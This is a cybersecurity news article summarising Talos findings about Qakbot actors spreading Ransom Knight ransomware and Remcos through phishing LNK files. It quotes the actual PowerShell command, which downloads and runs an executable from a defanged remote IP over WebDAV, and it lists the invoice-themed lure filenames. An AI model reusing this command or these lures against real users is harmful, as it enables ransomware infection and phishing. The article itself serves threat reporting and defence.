Categories: Cyber Security NewsRansomwareTHREATS

Qakbot Threat Actors Deliver Knight Ransomware & Remcos Via LNK Files

Qakbot’s infrastructure and cryptocurrency assets were seized by government authorities in an operation in August 2023 with the assistance of international allies, raising concerns about the affiliates of Qakbot.

Talos researchers moderately believe Qakbot threat actors remain active, launching a recent campaign with Cyclops/Ransom Knight ransomware and the Remcos backdoor, tracked through LNK file metadata connections to past campaigns.

Talos researchers used LNK file metadata to trace threat actors, linking the “AA” and “BB” campaigns in January 2023.

After their report, Qakbot actors in the “AA,” “BB,” and “Obama” campaigns began removing LNK file metadata to evade detection and tracking.

Document

FREE Demo

Deploy Advanced AI-Powered Email Security Solution

Implementing AI-Powered Email security solutions “Trustifi” can secure your business from today’s most dangerous email threats, such as Email Tracking, Blocking, Modifying, Phishing, Account Take Over, Business Email Compromise, Malware & Ransomware

Technical analysis

New LNK files from the same system were discovered by Talos in August 2023, leading to a network share that contained the ransomware Ransom Knight. According to analysis, they direct users to Powershell.exe and pass parameters for the subsequent download step:-

-c “explorer ‘\\89[.]23[.]96[.]203@80\333\'”; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89[.]23[.]96[.]203@80\333\information.exe

Executing Explorer.exe to access remote IP 89[.]23[.]96[.]203 via WebDAV (port 80) might evade command line detection for PowerShell remote executable downloads (T1105).

These LNK filenames hint at urgent financial topics, indicating phishing in Qakbot campaigns. Here below, we have mentioned all the filenames of the LNK files:-

ATTENTION-Invoice-29-August.docx.lnk
bank transfer request.lnk
Booking info.pdf.lnk
Fattura NON pagata Agosto 2023.docx.lnk
FRAUD bank transfer report.pdf.lnk
invoice OTP bank.pdf.lnk
MANDATORY-Invoice-28-August.docx.lnk
NOT-paid-Invoice-26-August.pdf.lnk
Nuove coordinate bancarie e IBAN 2023.docx.lnk
Nuove coordinate bancarie e IBAN 2023.img.lnk
Pay-Invoices-29-August.pdf.lnk
URGENT-Invoice-27-August.docx.lnk

Italian filenames hint at regional targeting, while LNK files in Zip archives accompany XLL files, typically associated with Excel add-ins and similar icons.

The LNK file fetches the Ransom Knight payload from remote IP 89[.]23[.]96[.]203 via WebDAV, marking an evolved version of the Cyclops ransomware, announced by its operator in May 2023

Experts suggest that Qakbot threat actors are customers, not operators, of the ransomware service. The FBI operation in August 2023 mainly targeted control servers, leaving email delivery unaffected.

While Qakbot distribution paused post-takedown, the threat could resurge if the operators rebuild their infrastructure.

Protect yourself from vulnerabilities using Patch Manager Plus to patch over 850 third-party applications quickly. Take advantage of the free trial to ensure 100% security.

Tushar Subhra

Tushar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.